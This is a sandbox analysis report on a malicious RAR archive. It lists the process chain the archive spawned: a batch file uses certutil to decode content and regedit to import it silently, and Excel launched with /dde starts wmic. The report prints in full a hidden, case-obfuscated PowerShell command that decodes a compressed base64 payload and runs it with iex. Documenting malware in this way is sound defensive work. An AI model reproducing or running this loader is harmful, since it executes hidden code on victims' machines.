File name: | Nuovo Archivio WinRAR.rar |
Full analysis: | https://app.any.run/tasks/e364ef0d-3e54-4b2c-b78a-cfcef4e46eba |
Verdict: | Malicious activity |
Analysis date: | September 19, 2019, 06:49:15 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/x-rar |
File info: | RAR archive data, v5 |
MD5: | EE91D51114130ED4505E5C0164D7C3F3 |
SHA1: | 4D74631737DD795A55497E1818C69E2AB2D8E346 |
SHA256: | DCA8B32E41A5E7715A686955C7D7709276672D5229F7A20D974017748588725E |
SSDEEP: | 1536:xrsv2SkF3GNbg4SrbN1SM4zrsv2SkF3GNbg4SrbN/SM/:GeSk0g4qbqtEeSk0g4qbQy |
.rar | | | RAR compressed archive (v5.0) (61.5) |
---|---|---|
.rar | | | RAR compressed archive (gen) (38.4) |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2776 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Nuovo Archivio WinRAR.rar" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Version: 5.60.0 | ||||
3448 | cmd /c ""C:\Users\admin\AppData\Local\Temp\Rar$DIa2776.28975\italiano.bat" " | C:\Windows\system32\cmd.exe | — | WinRAR.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2172 | tzutil /s "W. Europe Standard Time" | C:\Windows\system32\tzutil.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Time Zone Utility Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2680 | certutil /decode "C:\Users\admin\AppData\Local\Temp\b64" "C:\Users\admin\AppData\Local\Temp\decoded" | C:\Windows\system32\certutil.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: CertUtil.exe Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3540 | regedit.exe /s "C:\Users\admin\AppData\Local\Temp\decoded" | C:\Windows\regedit.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Registry Editor Exit code: 3221226540 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
4012 | "C:\Windows\regedit.exe" /s "C:\Users\admin\AppData\Local\Temp\decoded" | C:\Windows\regedit.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Registry Editor Exit code: 3221226540 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
840 | "C:\Windows\regedit.exe" /s "C:\Users\admin\AppData\Local\Temp\decoded" | C:\Windows\regedit.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Registry Editor Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2728 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | WinRAR.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Version: 14.0.6024.1000 | ||||
796 | wmic.eXe pROCESs "CAll" CReate "PowErSHelL -WiND hIDDEN -ExEcuTIoNpOLIC byPAsS -NONIn -noPR "\" sal OO iEx;(nEw-oBJeCT sYStEM.Io.STrEaMREAdEr(( nEw-oBJeCT Io.COMPRESSIon.deflATESTreAm([Io.MeMoRystREAm][sYsTEM.cOnvErt]::fROMbasE64STriNG('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')"\" + ([CHAR]44).ToSTRiNG()+"\"[SYstem.IO.comPrEssion.ComprESsIoNMOde]::decOmpReSs))"\" + ([CHAR]44).ToSTRiNG()+"\"[tEXT.encoDiNg]::utf8)).reADtoeNd( )|OO"\"|iEX" | C:\Windows\System32\Wbem\wmic.eXe | — | EXCEL.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: WMI Commandline Utility Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3016 | PowErSHelL -WiND hIDDEN -ExEcuTIoNpOLIC byPAsS -NONIn -noPR "\" sal OO iEx;(nEw-oBJeCT sYStEM.Io.STrEaMREAdEr(( nEw-oBJeCT Io.COMPRESSIon.deflATESTreAm([Io.MeMoRystREAm][sYsTEM.cOnvErt]::fROMbasE64STriNG('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')"\" + ([CHAR]44).ToSTRiNG()+"\"[SYstem.IO.comPrEssion.ComprESsIoNMOde]::decOmpReSs))"\" + ([CHAR]44).ToSTRiNG()+"\"[tEXT.encoDiNg]::utf8)).reADtoeNd( )|OO"\"|iEX | C:\Windows\System32\WindowsPowerShell\v1.0\PowErSHelL.exe | — | wmiprvse.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2728 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRF784.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2728 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DFD284C8140AA69BCB.TMP | — | |
MD5:— | SHA256:— | |||
3016 | PowErSHelL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\D8DF0GSAYN9YYABLBK18.temp | — | |
MD5:— | SHA256:— | |||
2716 | csc.exe | C:\Users\admin\AppData\Local\Temp\CSC474.tmp | — | |
MD5:— | SHA256:— | |||
2716 | csc.exe | C:\Users\admin\AppData\Local\Temp\r_8rw2nx.pdb | — | |
MD5:— | SHA256:— | |||
3620 | cvtres.exe | C:\Users\admin\AppData\Local\Temp\RES475.tmp | — | |
MD5:— | SHA256:— | |||
2716 | csc.exe | C:\Users\admin\AppData\Local\Temp\r_8rw2nx.dll | — | |
MD5:— | SHA256:— | |||
2716 | csc.exe | C:\Users\admin\AppData\Local\Temp\r_8rw2nx.out | — | |
MD5:— | SHA256:— | |||
2728 | EXCEL.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\559D0089.emf | — | |
MD5:— | SHA256:— | |||
2728 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DF0C704B6C2AF0EB4A.TMP | — | |
MD5:— | SHA256:— |
Process | Message |
---|---|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cppĒ |
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|